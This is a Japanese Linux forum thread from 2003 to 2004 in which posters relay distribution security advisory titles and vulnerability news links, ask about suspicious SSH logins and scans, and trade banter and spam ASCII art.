278:login:Penguin
03/01/09 04:16 O
279:i0l0YhT.net
280:login:Penguin
03/01/09 17:48 QGQ81fMJ.net
1/8
Debian Security Advisory
DSA-224-1 canna -- buffer overflow and more
281:login:Penguin
03/01/11 15:23 /9+PJpGC.net
Debian Security Advisory
1/10
DSA-226 xpdf-i integer overflow
1/9
DSA-225 tomcat4 source disclosure
282:山崎渉
03/01/15 11:44 wo7m90to.net
(^^)
283:login:Penguin
03/01/19 17:16 uf20jSa0.net
Debian
1/17] DSA-231 dhcp3 stack overflows
1/16 DSA-230 bugzilla insecure permissions, spurious backup files
1/15 DSA-229 imp SQL injection
1/14 DSA-228 libmcrypt buffer overflows and memory leak
1/13 DSA-227 openldap2 buffer overflows and other bugs
284:login:Penguin
03/01/24 13:01 oqnAbVW5.net
Debian
1/23
DSA-240 kdegames several
DSA-239 kdesdk several
DSA-238 kdepim several
DSA-237 kdenetwork several
1/22
DSA-236 kdelibs several
DSA-235 kdegraphics several
DSA-234 kdeadmin several
1/21
DSA-233 cvs doubly freed memory
1/20
DSA-232 cupsys several
285:login:Penguin
03/01/26 15:14 sb23W7KJ.net
Debian
1/24
DSA-243 kdemultimedia several
DSA-242 kdebase several
DSA-241 kdeutils several
286:login:Penguin
03/02/02 16:35 Rt1NfCad.net
Debian
1/31
DSA-248 hypermail buffer overflows
1/30
DSA-247 courier-ssl missing input sanitizing
1/29
DSA-246 tomcat information exposure, cross site scripting
1/28
DSA-245 dhcp3 ignored counter boundary
1/27
DSA-244 noffle buffer overflows
287:login:Penguin
03/02/18 15:12 CekoRUxQ.net
Debian
2/14
DSA-251 w3m missing HTML quoting
2/12
DSA-250 w3mmee-ssl missing HTML quoting
2/11
DSA-249 w3mmee missing HTML quoting
288:login:Penguin
03/02/20 19:30 6GOTZljH.net
OpenSSL Security Advisory [19 February 2003]
Timing-based attacks on SSL/TLS with CBC encryption
URLリンク(www.openssl.org)
289:login:Penguin
03/02/25 19:35 kTElg38X.net
Debian
2/24
DSA-253 openssl information leak
2/21
DSA-252 slocate buffer overflow
290:login:Penguin
03/03/04 10:45 9DAOHkRs.net
Sendmail における深刻なセキュリティ脆弱性について
URLリンク(www.ipa.go.jp)
291:login:Penguin
03/03/04 10:46 eH2UwdTM.net
Sendmailのヘッダー処理に対する脆弱性
URLリンク(www.isskk.co.jp)
Remote Sendmail Header Processing Vulnerability
URLリンク(www.iss.net)
CERT Advisory CA-2003-07 Remote Buffer Overflow in Sendmail
URLリンク(www.cert.org)
292:bloom
03/03/04 11:44 IbbEqegY.net
URLリンク(www.agemasukudasai.com)
293:login:Penguin
03/03/04 11:54 XcJd8/fD.net
>>283-284
洒落にならんな、これは。
294:login:Penguin
03/03/04 22:54 4pdCFVc3.net
洒落にならんけど、不要に煽る香具師もどうかと :-)
295:login:Penguin
03/03/05 13:51 sbwwPHEA.net
だれが不要に煽ってるんだ? 被害妄想だろ。
296:login:Penguin
0
297:3/03/05 13:58 ID:EsL/wirr.net
298:login:Penguin
03/05/27 23:35 qlYLaq9J.net
URLリンク(www.vinelinux.org)
に出ている「sambaのセキュリティホール」ってのは、
Vine 2.1.5 以下には関係無いの??
URLリンク(www.vinelinux.org)
299:290
03/05/28 00:53 goQ6Azbn.net
あ、補足です。>>290は、
URLリンク(www.vinelinux.org)
の2003,05,17 付けの方の「sambaにセキュリティホール」
についてです。
300:山崎渉
03/05/28 16:40 4u9ffZfO.net
∧_∧
ピュ.ー ( ^^ ) <これからも僕を応援して下さいね(^^)。
=〔~∪ ̄ ̄〕
= ◎―◎ 山崎渉
301:山崎 渉
03/07/15 11:34 2JhhXBQM.net
__∧_∧_
|( ^^ )| <寝るぽ(^^)
|\⌒⌒⌒\
\ |⌒⌒⌒~| 山崎渉
~ ̄ ̄ ̄ ̄
302:ぼるじょあ ◆yBEncckFOU
03/08/02 05:27 +QUfMouI.net
∧_∧ ∧_∧
ピュ.ー ( ・3・) ( ^^ ) <これからも僕たちを応援して下さいね(^^)。
=〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
= ◎―――◎ 山崎渉&ぼるじょあ
303:login:Penguin
03/08/15 09:32 Fk89fFRa.net
age
304:山崎 渉
03/08/15 22:16 dil3w4kp.net
(⌒V⌒)
│ ^ ^ │<これからも僕を応援して下さいね(^^)。
⊂| |つ
(_)(_) 山崎パン
305:山崎 渉
03/08/15 22:29 ep0zwfOh.net
(⌒V⌒)
│ ^ ^ │<これからも僕を応援して下さいね(^^)。
⊂| |つ
(_)(_) 山崎パン
306:login:Penguin
03/08/19 14:07 678Ux40N.net
3日前ぐらいから
210.21.34.66 - - [19/Aug/2003:11:20:36 +0900] "GET / HTTP/1.1" 200 3208 "-" "Moz
illa/4.0 (compatible; MSIE 5.5; Windows 98)"
61.182.255.188 - - [19/Aug/2003:11:21:30 +0900] "GET / HTTP/1.1" 200 3208 "-" "M
ozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
みたいなのがすごい頻度(2分おきぐらい)でapache宛にくるんですが、これってどれと関連してるの?
307:login:Penguin
03/08/24 19:44 LGNONZ7b.net
Linuxにセキュリティホールなんてあるわけないだろ
M$の糞OSと一緒にすんな
308:login:Penguin
03/08/24 20:29 FhrrhDDR.net
つまらん
309:ピーター・ベントン
03/09/24 01:21 juie5mui.net
OpenSSHにもバグが
URLリンク(japan.cnet.com)
310:login:Penguin
03/10/01 19:20 Ps8l3gR3.net
OpenSSLにDoSを引き起こす脆弱性
311:login:Penguin
03/10/27 23:34 ERg+VwNs.net
穴があったら入りたい
312:login:Penguin
03/10/28 21:54 obMOUynA.net
Linux勧告ウォッチ - 2003年10月24日
URLリンク(japan.linux.com)
313:login:Penguin
03/10/30 08:27 ySJ+EFpp.net
Apache 1.3系列、2.0系列がともにバージョンアップ
URLリンク(www.zdnet.co.jp)
314:login:Penguin
03/11/02 11:32 9Ygmx0G1.net
Mac OS Xに大量の脆弱性、解決策は新バージョンのOSへの移行のみ
URLリンク(www.zdnet.co.jp)
URLリンク(www.zdnet.co.jp)
URLリンク(headlines.yahoo.co.jp)
URLリンク(japan.cnet.com)
URLリンク(internet.watch.impress.co.jp)
"Panther"に深刻な障害--一部の外付けHDでデータ消失の危険性
URLリンク(headlines.yahoo.co.jp)
URLリンク(www.zdnet.co.jp)
URLリンク(japan.cnet.com)
URLリンク(www.lacie.co.jp)
315:ファンファン
03/11/02 20:25 556aM5ia.net
遂にドラクエ9発�
316:пI 詳細はここで入手! http://www.dorakue.com
317:login:Penguin
03/11/05 14:42 9kuD0vlS.net
Linux勧告ウォッチ - 2003年10月31日
URLリンク(japan.linux.com)
318:login:Penguin
03/11/11 15:14 HsPpywCL.net
Linux勧告ウォッチ - 2003年11月7日
URLリンク(japan.linux.com)
319:login:Penguin
03/11/18 21:48 SdQL4FsV.net
Linux勧告ウォッチ - 2003年11月14日
URLリンク(japan.linux.com)
320:login:Penguin
03/11/27 01:44 prSLxxQ4.net
Linux勧告ウオッチ - 2003年11月21日(金)
URLリンク(japan.linux.com)
321:login:Penguin
03/12/02 21:52 QTZAxPpf.net
Linux勧告ウオッチ - 2003年11月28日(金)
URLリンク(japan.linux.com)
322:login:Penguin
03/12/09 18:13 /fLfndsD.net
Linux勧告ウオッチ - 2003年12月5日(金)
URLリンク(japan.linux.com)
323:login:Penguin
03/12/16 15:15 mykGXu/A.net
Linux勧告ウオッチ - 2003年12月12日(金)
URLリンク(japan.linux.com)
324:login:Penguin
03/12/17 10:12 VpqBEH4o.net
ethereal
0.9?.?? => 0.10かよ
325:login:Penguin
03/12/17 18:49 TkILKMt3.net
Debian
12/17
DSA-401-1 hylafax -- format strings
12/17
DSA-402-1 minimalist -- unsanitised input
326:login:Penguin
03/12/24 16:35 iGk6TAXx.net
Linux勧告ウオッチ - 2003年12月19日(金)
URLリンク(japan.linux.com)
327:login:Penguin
03/12/30 14:32 qU3nvfcf.net
Linux勧告ウオッチ - 2003年12月26日(金)
URLリンク(japan.linux.com)
328:login:Penguin
03/12/31 16:05 m71Pca6B.net
12/29
Gentoo: cvs Privilege escalation vulnerability
12/30
Debian: xsok Missing privelige release
329:login:Penguin
04/01/01 17:24 WtCAo48K.net
12/31
Mandrake: proftpd Root access vulnerability
330:login:Penguin
04/01/06 16:04 tgdBSY23.net
1/5/
Suse: kernel Privilege escalation vulnerability
1/5/
Red Hat: kernel Privilege escalation vulnerability
1/5/
Debian: screen Privilege leak vulnerability
1/5/
Debian: lftp Buffer overflow vulnerability
1/5/
Debian: ethereal Denial of service attack
331:login:Penguin
04/01/07 14:32 mCNdx8uW.net
1/6
Debian: kernel Privilege escalation vulnerability
1/6
Turbolinux: kernel Privilege escalation vulnerability
1/6
Debian: nd Buffer overflow vulnerability
1/6
Debian: mpg321 Malformed format string vulnerability
1/6
Debian: libnids Buffer overflow vulnerability
1/6
Debian: BIND Cache poisoning vulnerability
1/6/
Fedora: kernel Privilege escalation vulnerability
332:login:Penguin
04/01/08 15:12 MHF0VDdD.net
1/7
Debian: kernel More for Priv. Esc vulnerability
1/7
Debian: fsp Buffer overflow/Directory traversal vulns.
1/7
Debian: zebra Denial of Service vulnerability
1/7
Debian: jabber Denial of Service vulnerability
1/7
Fedora: etherial Denial of Service vulnerability
1/7
Slackware: kernel Privilege escalation vulnerability
333:login:Penguin
04/01/09 00:08 uoDpOTlw.net
1/8
Debian: vbox3 Privilege leak vulnerability
334:login:Penguin
04/01/09 17:56 m1uGuzrs.net
1/8
Red Hat: etherial Denial of Service vulnerabilities
1/8
Mandrake: kernel Privilege escalation vulnerability
335:login:Penguin
04/01/10 14:20 NAw+6fyF.net
1/9
Debian: kernel Priv. Escal. additional patches
1/9
Debian: phpgroupware Multiple vulnerabilities
1/9
Slackware: kernel Priv. Escal. patch for 8.1
1/9
Gentoo: kernel Privilege escalation vulnerability
336:login:Penguin
04/01/13 15:43 34XHBVjP.net
1/12
Debian: mod-auth-shadow Account expiration not enforced
1/12
Red Hat: cvs Chroot breakout vulnerability
1/12
Debian: jitterbug Improper input sanatizing
337:login:Penguin
04/01/14 14:38 rCvtgFmv.net
1/13
Mandrake: etherial Multiple DoS vulernabilities
338:login:Penguin
04/01/15 00:33 3fXHLowM.net
1/14
Red Hat: kdepim Buffer overflow vulnerability
1/14
Suse: tcpdump Denial of service vulnerability
339:login:Penguin
04/01/15 15:22 dMc7vbOt.net
1/14
Red Hat: tcpdump Denial of service vulnerability
340:login:Penguin
04/01/16 01:41 +3ppuQmE.net
1/15
Mandrake: kdepim Permission leak vulnerability
1/15
Slackware: kdepim Permission leak vulnerability
1/15
Slackware: INN Buffer overflow vulnerability
1/15
Suse: kernel Many vulnerabilities fixed for 64bit
1/15
Debian: kernel-image-2.4.17-ia64 Many backported vuln fixes
1/15
Debian: cvs Multiple vulnerabilities
341:login:Penguin
04/01/17 15:54 5S8lxjG3.net
1/16
Debian: tcpdump Multiple vulnerabilities
1/16
Debian: mc Improper execution vulnerability
342:login:Penguin
04/01/20 15:50 mQMVpaJK.net
1/19
Debian: kernel MIPS version of mremap() fix
1/19
Debian: netpbm-free Insecure temporary files
343:login:Penguin
04/01/22 14:45 jmIdE/7G.net
1/21
Red Hat: mc Buffer overflow vulnerability
1/20
Debian: slocate Heap buffer overflow
344:login:Penguin
04/01/23 15:26 7CVecfCu.net
1/22
Red Hat: slocate Heap overflow vulnerability
1/22
Gentoo: honeyd Honeyd remotely identifiable
1/22
Turbolinux:
345:lftp and tcpdump Multiple vulnerabilities
346:login:Penguin
04/01/24 15:57 9X5tQd78.net
1/23
Mandrake: jabber Denial of service vulnerability
1/23
Mandrake: slocate Heap overflow
347:login:Penguin
04/01/27 15:46 hvesCWle.net
1/26
Debian: gnupg Signing key vulnerability
1/26
Slackware: gaim Multiple vulnerabilities
1/26
Fedora: slocate Heap overflow vulnerability
1/26
Red Hat: gaim Multiple vulnerabilities
348:login:Penguin
04/01/27 16:33 YyU14vbY.net
今しがた、SSHでサーバをいじっていたらなぜか、SSHが切られたので
w をしてみるとなぜか、自分以外にSSHで入っているやつが3人いた。
しかもIPとか知らないやつのだし…。とりあえず、SSHを落としておいたけど
なぜ??ユーザも一人しか作ってないし、パスワードだってかなり意味不明な
羅列にしているんだが。
349:login:Penguin
04/01/27 17:11 OegfoTkR.net
なぜって、あーた・・・・
350:login:Penguin
04/01/27 17:28 zm4xkZWO.net
>>338
誤爆か
スレリンク(linux板)
351:login:Penguin
04/01/28 12:59 VzrkJnLc.net
1/27
Fedora: screen Privilege escalation vulnerability
1/27
Gentoo: gaim Multiple vulnerabilities
1/27
Gentoo: mod_python Denial of service vulnerability
1/27
Mandrake: tcpdump Non-sanitized input vulernability
1/27
Mandrake: mc Buffer overflow vulnerability
1/27
Mandrake: gaim Multiple vulnerabilities
352:login:Penguin
04/01/29 11:50 qUlrQkgM.net
1/28
Debian: trr19 Missing privilege release
353:login:Penguin
04/01/30 14:33 MB+bTEJk.net
1/29
Suse: gaim Multiple vulnerabilities
354:この頃思うこと
04/02/01 22:44 OV3kvQR/.net
最近、強力なウイルスが時々出回るようになった。
標的は、ほぼ市場を独占状態のOSだが、その度に大騒ぎして多数のPCに対応
ソフトを入れていると、何だかバカバカしくなってくる。影で誰かが儲けて
いるんじゃないかと勘ぐりたくさえなる。
とはいえ、SOHOに限らずメールの送受信ができなくなれば死活問題となるわけで、
いつも、何とかするわけだが。最悪、感染したときの対応策は用意しておいた
方がよさそうだ。
そのひとつの方法は、代替OSを用意しておくことかもしれないとこの頃思う。
OSも幾つかあるが、
MACは専用のPCやOSが必要なので割高だ。となると、LINUX系を起動できるよう
にしておいて、とにかく急場をしのぐ方法が良さそうに思えるのだが・・
むろん、今後、LINUX系が普及するにつれて、それを標的にするウイルスが出ない
とは言えないのだけれど、現時点ではどんなものだろうか。
355:login:Penguin
04/02/03 00:27 p/emivL5.net
2/2
Debian: perl Information leak
356:login:Penguin
04/02/03 15:34 4QCHqYoG.net
2/2
Mandrake: gaim Multiple vulernabilities
2/2
Fedora: cvs Multiple vulnerabilities
357:login:Penguin
04/02/04 00:52 B2bpk8Si.net
2/3
Fedora: etherial Denial of service vulnerability
2/3
Fedora: tcpdump Malformed packet vulnerability
2/3
Red Hat: util-linux Login data leakage
2/3
Red Hat: mc Buffer overflow vulnerability
2/3
Red Hat: NetPBM Temporary file vulnerabilities
358:login:Penguin
04/02/04 17:22 2SiWtXLZ.net
2/3
Red Hat: kernel Multiple vulnerabilities
2/3
Debian: crawl Buffer overflow vulnerability
359:login:Penguin
04/02/05 14:41 IYKi/1SV.net
2/4
Debian: kernel Privilage escalation MIPS patch
360:login:Penguin
04/02/07 15:54 HkAvMxBY.net
2/6
Red Hat: 'netpbm' temporary file vulnerabilities
2/6
Debian: 'mpg123' heap overflow
2/6
Debian: 'gaim' vulnerabilities
2/5
Red Hat: 'mailman' XSS vulnerabilities
2/5
Mandrake: 'glibc' resolver overflow
361:login:Penguin
04/02/10 15:52 qHPAEEwe.net
2/9
Red Hat: gaim Multiple vulnerabilities
2/9
Gentoo: PHP Leaking globals vulnerability
2/9
Debian: mailman Multiple vulnerabilities
2/9
Red Hat: NetPBM Temporary file vulnerabilities
362:login:Penguin
04/02/12 15:41 ZifOyE2f.net
2/11
Red Hat: mutt Denial of service vulnerability
2/11
Gentoo: gallery PHP injection vulnerability
2/11
Gentoo: monkeyd Denial of service vulnerability
2/11
Gentoo: XFree86 Buffer overflow vulnerability
363:login:Penguin
04/02/13 00:43 6DEVRcPX.net
2/12
Mandrake: netpbm Temporary file vulnerabilities
2/12
Mandrake: mutt Denial of service vulnerability
2/12
Debian: cgiemail Open mail relay
364:login:Penguin
04/02/14 16:44 mnqazerT.net
2/13
Slackware: XFree86 Multiple buffer overflows
2/13
Slackware: mutt Buffer overflow vulnerability
2/13
Red Hat: PWLib Denial of service vulnerability
2/13
Red Hat: XFree86 Multiple buffer overflows
365:login:Penguin
04/02/18 23:06 U3AQAaGV.net
ぬう
Linux kernel do_mremap VMA limit local privilege escalation vulnerability
A critical security vulnerability has been found in the Linux kernel
memory management code inside the mremap(2) system call due to missing
function return value check. This bug is completely unrelated to the
mremap bug disclosed on 05-01-2004 except concerning the same internal
kernel function code.
URLリンク(www.isec.pl)
366:login:Penguin
04/04/19 21:18 fav3bE2Z.net
Linux勧告ウォッチ - 2004年4月16日(金)
URLリンク(japan.linux.com)
367:login:Penguin
04/05/08 17:40 MyEV46Nv.net
lhaにセキュリティホールが見つかったらすぃ
368:login:Penguin
04/05/08 18:01 i2Twl562.net
>>357
これでつね。
スレリンク(linux板:320番)
369:login:Penguin
04/05/10 19:14 LN1iQt2e.net
作者は放置プレイ気味
370:login:Penguin
04/05/16 23:40 ijfOJj2d.net
元々lhaは日本でしか使われてないだろうし
そろそろ使うの止めて欲しいもんだ
371:login:Penguin
04/05/16 23:45 aVnYK0wB.net
DOOMがLHAで圧縮されていたのを思い出した
372:login:Penguin
04/05/20 14:21 WWYnnNvB.net
cvsとsubversionにセキュリティホールだと。
373:login:Penguin
04/05/21 18:19 6uFN7DQY.net
埋めますた
374:login:Penguin
04/05/21 18:22 lpNxrFu0.net
sourceforge.jpがやられたのってこれかね。
375:login:Penguin
04/05/21 18:39 6uFN7DQY.net
シスコがTCP欠陥セキュリティフィックスの特許を申請
URLリンク(japan.cnet.com)
376:login:Penguin
04/06/10 15:04 swAq85SC.net
オープンソース・コード管理アプリ「CVS」に6つの脆弱性--セキュリティ研究者らが発見
URLリンク(japan.cnet.com)
ソッコー埋めとけよ。
前回見事にクラックされたサイトの管理者諸君。
377:login:Penguin
04/06/10 23:51 Biho7Cx0.net
今回はどこが醜態を晒すのか見物
378:login:Penguin
04/06/11 00:17 MlvinFBo.net
今回それはないヨ。exploitが晒されていないからね。
侵入される奴もヘタレなら侵入する奴もヘタレ。
379:login:Penguin
04/06/11 00:28 tEEDVtFM.net
>>368
惜しい!もうちょっとでIDがvine
380:login:Penguin
04/06/24 23:48 LKAGg7Xa.net
●.....●..●..●...●●..●●...●●..●●●....●●●●..●●.....●●●..●..●
無料のウイルス対策ソフトなどのセキュリティソフト一覧
URLリンク(www.geocities.co.jp)
●.●.●.●..●...●●.●..●●.●●......●..●●...●●...●●●.....●.●...●
381:login:Penguin
04/06/25 08:40 3aBxue6Z.net
(´-`).。oO(板が違う気がする…)
382:login:Penguin
04/06/28 15:18 7wrh5jjV.net
Hiki の脆弱性に関する注意喚起
URLリンク(www.namaraii.com)
383:login:Penguin
04/06/29 14:45 znjWYPYB.net
Apacheに新たな脆弱性、各社がパッチリリース
URLリンク(www.itmedia.co.jp)
384:login:Penguin
04/06/29 20:26 AEBbJAuz.net
>>373
ITMediaは二週間前の脆弱性を今頃騒いでどうする?
もしかして腐れDebian厨が居るのか?
385:login:Penguin
04/06/30 05:19 Yw6CWVlx.net
↑腐れヘドロ厨
386:
387:login:Penguin
04/06/30 05:31 VxTrWu/Q.net
バグだらけのFedora何て使ってるとストレス溜まるんでつね。
イキロ>>374
388:login:Penguin
04/06/30 08:00 3WcuXvGN.net
Deb厨って本当に社会のあちこちで迷惑をかけてるな
389:login:Penguin
04/07/01 19:48 OqSpKNxT.net
linux 2.6 に死のパケット脆弱性
URLリンク(www.ku3g.org)
390:login:Penguin
04/07/03 18:42 I8EJ9gk9.net
フレーム詐称の問題はIE以外のWebブラウザにも
URLリンク(www.itmedia.co.jp)
391:login:Penguin
04/07/04 00:08 4SqICt0G.net
HPがセキュリティ問題でNetscapeの削除を呼びかけ
URLリンク(www.itmedia.co.jp)
392:たわば
04/07/23 14:07 2ZKDc5PV.net
ファイル共有ソフトSamabaにセキュリティ・ホール
URLリンク(nikkeibp.jp)
393:login:Penguin
04/08/17 16:56 kG5XOZPe.net
CVSにまた新たな脆弱性
URLリンク(www.itmedia.co.jp)
394:login:Penguin
04/09/04 00:53 tJIPt+jW.net
URLリンク(www.inter7.com)
395:login:Penguin
04/09/17 14:42:44 VXVHqApo.net
GdkPixBufに脆弱性、Linuxベンダーが対応
URLリンク(www.itmedia.co.jp)
396:login:Penguin
04/09/28 05:05:35 Y+uhbf9u.net
「苺きんたま」(トロイの木馬)が2chで流行中。Linuxにも感染するそうです。
URLリンク(headlines.yahoo.co.jp)
URLリンク(www.symantec.com)
397:login:Penguin
04/09/28 08:12:20 nlw8901Q.net
>>385
> Linuxにも感染するそうです。
ソースきぼん。
398:login:Penguin
04/09/28 08:22:45 qeKmiFBj.net
それよりJpeg-GDIウィルスのほうが重大問題だけどな。
399:login:Penguin
04/09/28 21:46:28 Y+uhbf9u.net
>>386
あ、ごめんLinuxは影響なしでした。
400:login:Penguin
04/10/02 20:11:13 0N5ydXGU.net
Sambaにセキュリティ・ホール,公開ディレクトリ外にアクセスされる
URLリンク(itpro.nikkeibp.co.jp)
401:login:Penguin
04/10/09 20:01:16 xhbHGJ5V.net
brutesshによるサーバへのアクセスがあるのですが、
これは、感染によって拡がるものなのでしょうか。
LAN内からのアクセスが見つかり、どうすべきか考えています。
402:login:Penguin
04/10/09 20:07:47 pBYKN384.net
>>390
ウィルスではないので感染はしない。
LAN内にクラックされたマシンか不届き者が居る。
403:login:Penguin
04/10/09 20:08:47 Vjy+vqkI.net
>>390
攻撃元のPCを調べりゃいいじゃん
404:login:Penguin
04/10/21 10:04:37 FxTdJBK4.net
非IEブラウザでタブ機能に脆弱性
URLリンク(www.itmedia.co.jp)
405:login:Penguin
04/10/25 17:36:28 bqye+ZzN.net
Apache、深刻な脆弱性修正のアップデートリリース
URLリンク(www.itmedia.co.jp)
406:login:Penguin
04/10/26 10:31:11 /V4ZShQ8.net
Linuxで利用のlibtiffとGaimに脆弱性
URLリンク(www.itmedia.co.jp)
407:login:Penguin
04/10/26 17:16:28 /V4ZShQ8.net
Linux勧告ウォッチ - 2004年10月22日(金)
URLリンク(japan.linux.com)
408:login:Penguin
04/10/27 07:53:07 4omHsqys.net
インターネットに接続しない場合は、セキュリティホールは
関係ないよね。
409:login:Penguin
04/10/27 10:03:37 Cgdba6iT.net
ローカルでログインしたユーザーからやられる場合はある。
410:login:Penguin
04/10/28 19:45:52 Z91dAyo0.net
オープンソースCMSのPostNuke、攻撃される
URLリンク(japan.linux.com)
411:login:Penguin
04/10/28 20:49:42 6h29YwsN.net
僕のセキュリティホールも埋めてください。
412:login:Penguin
04/10/29 12:09:50 6b+D47df.net
埋めてやるからroot権限をくれ。
413:login:Penguin
04/10/31 16:59:20 +ety0bys.net
OpenSSL version 0.9.7e released
Fix race condition in CRL checking code.
Fixes to PKCS#7 (S/MIME) code.
URLリンク(www.openssl.org)
414:login:Penguin
04/11/03 11:59:04 eDxNwooz.net
Linux勧告ウォッチ - 2004年10月29日(金)
URLリンク(japan.linux.com)
415:login:Penguin
04/11/03 19:08:05 j4ONkIbo.net
僕のヒップホールも埋めてください。
416:login:Penguin
04/11/05 20:40:57 a6sIbeQb.net
×ヒップホール
○アヌス
417:login:Penguin
04/11/10 00:41:58 /czt/x2r.net
Linux勧告ウォッチ - 2004年11月5日(金)
URLリンク(japan.linux.com)
418:login:Penguin
04/11/18 17:19:34 wovyIy70.net
Linux勧告ウォッチ - 2004年11月12日(金)
URLリンク(japan.linux.com)
419:login:Penguin
04/11/18 21:46:20 4065SAaP.net
玄箱HG買ってきて、NATでsshと
thttpを通して使っていますが、
どの程度脆弱なのか教えてほしい。
付属のバイナリそのままです。
420:login:Penguin
04/11/19 00:07:37 k0IUrB5V.net
>>408
おまえの脳と同じ位モロヨワ
421:login:Penguin
04/11/21 18:41:00 YIsvNf8c.net
Samba 3.0.7以前にBuffer Overrunのバグ
URLリンク(slashdot.jp)
422:login:Penguin
04/11/21 23:27:49 nQ1PzIeT.net
>>410
Samba2.2.Xもアウトの模様。
Sambaチームとしては、2.2系はすでにディスコン扱い。
RedHat AS系のsrc.rpmからパッチ抜き出して、手パッチ当てることで対応可能。
お勧めは、3.0系についでにアップデート。